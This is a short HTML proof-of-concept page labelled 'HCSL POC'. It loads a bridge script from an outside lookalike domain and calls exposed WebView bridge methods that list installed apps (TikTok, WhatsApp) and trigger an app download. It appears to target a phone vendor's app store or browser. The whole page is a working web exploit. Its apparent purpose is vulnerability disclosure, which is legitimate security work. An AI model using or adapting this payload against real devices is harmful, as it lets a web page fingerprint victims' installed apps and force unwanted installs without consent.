<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>HCSL POC</title>
</head>
<body>
    <h1>Don't worried,this just a poc by HCSL.^_^</h1>
    <script type="text/javascript" src="https://wwwxhihonor.com/dsbridge.js"> </script>
    <script>
        bridge.call("download.queryAppList", {pkgNameList: "com.zhiliaoapp.musically,com.whatapp"}, function (result_json) {
        })
        bridge.call("download.downloadButtonOnClick",{packageName: "com.zhiliaoapp.musically"}, function (v) {
           })     
    </script>  
</body>
</html>
